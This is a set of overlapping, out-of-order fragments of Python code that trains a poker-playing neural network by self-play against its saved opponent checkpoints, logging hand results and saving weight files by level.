"2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time =",
"randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size",
"rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings = [] total_saldo",
"j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act,",
"go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time /",
"# Play against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f)",
"state, rnd_odds1) is_fake_action = False # In case of fold we can continue",
"#opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models,",
"round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo,",
"start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\",",
"saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def",
"True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state =",
"winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size -",
"= [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo",
"moment of first fold:\", hand_saldo) # randomize new action and continue playing... [action,",
"i, \"\\n\", file=f) f.flush() states = [] actions = [] winnings = []",
"50000 num_hands = 4000 what_if_play = True do_training = True training_epochs = 30",
"= ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state)",
"in states: all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn)",
"/ real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4)",
"\".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1",
"in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2",
"what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] <",
"player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state =",
"print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per",
"rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0]",
"saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1]",
"= [] while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount",
"hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo",
"return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names =",
"if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\",",
"pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models =",
"of first fold:\", hand_saldo) # randomize new action and continue playing... [action, action_ind],",
"\"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states,",
"st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time",
"m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id",
"def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions =",
"append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act",
"state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\",",
"opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names",
"= 4000 what_if_play = True do_training = True training_epochs = 30 # Leveling",
"2)) for st in states: all_states.append(st) for act in actions: all_actions.append(act) for winn",
"to fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0",
"= training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time()",
"model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings = []",
"left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for",
"= [] all_actions = [] all_winnings = [] total_saldo = [0, 0] for",
"\"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training",
"gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds =",
"print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo =",
"all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings)",
"20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = []",
"if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs",
"= [] all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\": if",
"gym.startHand() all_states = [] all_actions = [] all_winnings = [] hand_saldo = []",
"hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level:",
"= 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) ==",
"= gym.startHand() all_states = [] all_actions = [] all_winnings = [] hand_saldo =",
"\", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play)",
"[action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case",
"is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount)",
"# real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1,",
"load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i in range(len(model_paths)): opp_model",
"new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True)",
"= len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play):",
"file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name,",
"saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states,",
"all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states",
"import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id",
"time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time",
"training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] <",
"+ str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name)",
"\"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\"",
"in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else:",
"0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands",
"\", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\")",
"= [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned",
"= load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5",
"validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\",",
"= \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name, file=f) f.flush() f.close()",
"saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i",
"model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\",",
"= m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models,",
"state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return",
"load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play = True do_training =",
"= [] actions = [] winnings = [] #saldos = [] go_to_next_level =",
"= state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of",
"[action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1,",
"action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state,",
"time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play)",
"all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states =",
"actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands",
"In case of fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and",
"0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount =",
"load_gym import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings):",
"saldo at the moment of first fold:\", hand_saldo) # randomize new action and",
"= load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play = True do_training",
"saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2)",
"as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings)",
"0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states,",
"states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands,",
"False # In case of fold we can continue playing... if (action ==",
"all_winnings = [] total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand:",
"== 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f",
"rnd_odds): models = [] opp_names = [] for i in range(len(model_paths)): opp_model =",
"print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 #",
"epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\",",
"all_actions = [] all_winnings = [] total_saldo = [0, 0] for i in",
"+= 1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if",
"can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to",
"saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1),",
"= 50000 num_hands = 4000 what_if_play = True do_training = True training_epochs =",
"\"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush()",
"num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \",",
"total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return",
"hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states, all_actions,",
"num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if",
"what_if_play = True do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl",
"False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms",
"opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model,",
"actions = [] winnings = [] #saldos = [] go_to_next_level = True #",
"1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models)",
"rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per",
"hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i + 1),",
"total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i in",
"saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000",
"append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] =",
"file=f) f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds,",
"rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions = [] all_winnings =",
"print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo",
"winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo)",
"next_level += 1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name)",
"start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j],",
"= m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of fold we",
"total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i",
"models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym",
"play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions",
"all_states = [] all_actions = [] all_winnings = [] hand_saldo = [] while",
"Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models:",
"[] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] ==",
"hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \"",
"\"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0])",
"opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name",
"open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name =",
"opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) #",
"actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0]",
"range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i])",
"i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym,",
"# randomize new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call,",
"= play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1]",
"state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo)",
"4000 what_if_play = True do_training = True training_epochs = 30 # Leveling params",
"states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs,",
"opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return",
"num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\",",
"all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states",
"\" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds):",
"rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings =",
"opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model",
"= state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo =",
"= m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)):",
"-hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo) # randomize new",
"[0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings,",
"0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\")",
"ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if",
"import load_gym import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings,",
"\"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to opponent",
"play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = []",
"if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue",
"i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0]",
"= 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0,",
"2), \",\", round(total_saldo[1] / (i + 1), 2)) for st in states: all_states.append(st)",
"= time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs,",
"= [] go_to_next_level = True # Play against opp models for j in",
"[state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand",
"opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last one left",
"data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models",
"200 next_level = 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i,",
"never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action,",
"*= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time",
"#saldos = [] go_to_next_level = True # Play against opp models for j",
"opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play = True",
"f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name, file=f)",
"ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind)",
"where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\",",
"+ 1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for st in",
"saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1,",
"print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\",",
"load_gym import load_gym import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states,",
"\"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else:",
"def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i in range(len(model_paths)):",
"winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo",
"training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100,",
"we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted",
"i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\")",
"in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo",
"all_states = [] all_actions = [] all_winnings = [] total_saldo = [0, 0]",
"len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1,",
"Play against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush()",
"batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time),",
"def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = []",
"max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last one",
"total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states,",
"hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo) #",
"True # Play against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j],",
"state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state,",
"fold:\", hand_saldo) # randomize new action and continue playing... [action, action_ind], ammount =",
"[] all_actions = [] all_winnings = [] total_saldo = [0, 0] for i",
"= [] opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i])",
"0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000",
"rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions = []",
"f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j],",
"f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): #",
"saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() -",
"m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action =",
"action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act ==",
"print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] /",
"real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f)",
"m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds,",
"winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\",",
"state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated",
"/ num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush()",
"= gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) ==",
"dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id =",
"new training model. Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name)",
"and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action =",
"1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs",
"= time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() -",
"/ (i + 1), 2)) for st in states: all_states.append(st) for act in",
"[] all_winnings = [] total_saldo = [0, 0] for i in range(num_hands): print(\"\")",
"model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings",
"/ (i + 1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for",
"0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo",
"\"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\",",
"for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands",
"to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0)",
"== 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\",",
"range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions = [] winnings",
"per hand:\", round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i +",
"opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time =",
"for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs",
"< saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 *",
"for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions",
"while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym,",
"all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size",
"all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings,",
"= False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands),",
"state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo)",
"file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to",
"== ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\")",
"[] all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act",
